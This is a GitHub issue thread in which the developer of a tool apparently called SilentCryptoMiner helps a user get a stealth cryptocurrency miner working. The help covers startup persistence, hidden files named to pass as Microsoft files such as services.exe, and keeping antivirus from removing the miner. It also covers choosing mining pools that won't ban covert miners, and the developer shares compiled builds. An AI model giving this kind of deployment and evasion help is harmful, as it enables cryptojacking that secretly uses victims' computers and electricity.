### ISSUE TITLE
Miner isn't working for me right now

### ISSUE THREAD

**Issue by T3Toxic** [UnamSanctam/SilentCryptoMiner#18]
So i made new miner with etc, eth and xmr, but whenever I run it. nothing happens, nothing with debug and nothing shows mining on my pools or when I don't have stealth on. https://www.mediafire.com/file/c11ejnxx2d7wczv/1st.xml/file is my settings. do you think you might know why this is happening?

**Comment by UnamSanctam** [comment]
The config file you sent does have "Stealth" enabled. Your settings are correct and mines for me, what GPU do you currently have? Though personally I don't run both an ETC and ETH miner simultaneously since it usually isn't that much more profitable than just running either by itself.

**Comment by T3Toxic** [comment]
I have a gtx 1070 but i thought it would work as, people who didn't have computers with an eth GPU would mine etc, but if it could mine eth then it would.

**Comment by T3Toxic** [comment]
i tried rebuilding the miner but still, nothing is working on my PC

**Comment by UnamSanctam** [comment]
Yes generally it will do that, try removing the ETH miner from the list although that shouldn't be a problem. You can also try and update your graphics card drivers https://github.com/UnamSanctam/SilentCryptoMiner/wiki#what-gpu-requirements-are-there-for-the-gpu-miners-to-work.

**Comment by T3Toxic** [comment]
I mean, it works when i make a miner on the old miner creator. but btw the one you ran yesterday is still on your PC. it's still mining, so I think you haven't removed it

**Comment by UnamSanctam** [comment]
I would try removing the ETH miner and see if it works with just the ETC and XMR miners. And yes it's possible that it's running, I don't usually check that one since it doesn't matter much and they get removed when I run all my other tests, it's not like you notice them when running anyways.

**Comment by T3Toxic** [comment]
okay, thanks

**Comment by T3Toxic** [comment]
yeah it's still not working

**Comment by UnamSanctam** [comment]
Run the checker and see if it appears.

**Comment by T3Toxic** [comment]
Watchdog Running: No
Miners:
GPUs:
 NVIDIA GeForce GTX 1070
Compatible GPU found: True

**Comment by UnamSanctam** [comment]
Try rebuilding the miner, are you using v2.0.1?

**Comment by T3Toxic** [comment]
yeah, i've tried a few times, but I'll try again

**Comment by T3Toxic** [comment]
yeah still nothing

**Comment by UnamSanctam** [comment]
Enable "DEBUG" if you haven't already and build a miner with that, then run it and see if you get any errors.

**Comment by T3Toxic** [comment]
nope nothing

**Comment by T3Toxic** [comment]
yeah idk what to do

**Comment by T3Toxic** [comment]
i might just stick with v1 miner

**Comment by UnamSanctam** [comment]
Well, in the file you sent me firstly the "Wallet Address" set there is a URL, secondly you should never use hashvault.pro because as you can see on their front page they WILL ban you unless you use a proxy, use this config and choose another pool.
[T3Toxic.zip](https://github.com/UnamSanctam/SilentCryptoMiner/files/7514122/T3Toxic.zip)

**Comment by T3Toxic** [comment]
okay thank you :)

**Comment by T3Toxic** [comment]
I'm really sorry for always asking dumb questions but do you have a pool that you would recommend?

**Comment by UnamSanctam** [comment]
You can try 2miners, MoneroOcean or nanopool if you want to mine XMR.

**Comment by T3Toxic** [comment]
i'm using nanopool right now and I'm going to only mine xmr and eth but still, no miners are showing. I really don't know why

**Comment by T3Toxic** [comment]
yeah, still no miners showing

**Comment by UnamSanctam** [comment]
Send me your configuration file again.

**Comment by UnamSanctam** [comment]
Yes that works just fine, here is a compiled version without "Startup" enabled (since you don't need that to test if it's working) [T3Toxic.zip](https://github.com/UnamSanctam/SilentCryptoMiner/files/7515122/T3Toxic.zip). Run T3Toxic.exe and then run the T3Toxic-checker.exe after a few seconds.

**Comment by T3Toxic** [comment]
yup it works from that file. I am so confuseed right now as why it wont work for me

**Comment by T3Toxic** [comment]
i'll build a new one and see how it goes

**Comment by T3Toxic** [comment]
nope no miners in the checker :/

**Comment by UnamSanctam** [comment]
No miners in the checker in your build, but miners in the checker with my build?

**Comment by T3Toxic** [comment]
yup

**Comment by T3Toxic** [comment]
i'm as confused as you are

**Comment by UnamSanctam** [comment]
Can you try and disable "Startup" in your build and then try to run it?

**Comment by T3Toxic** [comment]
okay

**Comment by T3Toxic** [comment]
bruh the miners show when startup is disabled

**Comment by UnamSanctam** [comment]
Yes then there is some problem with installing it, can you try and change the "Filename" in the startup and see if that fixes it? Also make sure that an antivirus isn't removing it or anything.

**Comment by UnamSanctam** [comment]
Try this and see if it works: [T3Toxic2.zip](https://github.com/UnamSanctam/SilentCryptoMiner/files/7515265/T3Toxic2.zip).

**Comment by T3Toxic** [comment]
works

**Comment by UnamSanctam** [comment]
All I did was change the "Startup" string in your config to `T3Toxic.exe`

**Comment by T3Toxic** [comment]
so microsoft\t3toxic.exe

**Comment by T3Toxic** [comment]
i'll try do that and see if it works

**Comment by UnamSanctam** [comment]
You can also try running `del "%AppData%\Microsoft\services.exe" /a:h` in an administrator CMD and then try with the normal. If you ever created a build with v2.0.0 with "Hide File" enabled then the remnant file from that build could still be there (and not writable to since it's hidden).

**Comment by T3Toxic** [comment]
it worked :) I made the filename Microsoft\T3Toxic.exe thank you for legit spending so much time helping

**Comment by UnamSanctam** [comment]
Ok great, good luck with everything.
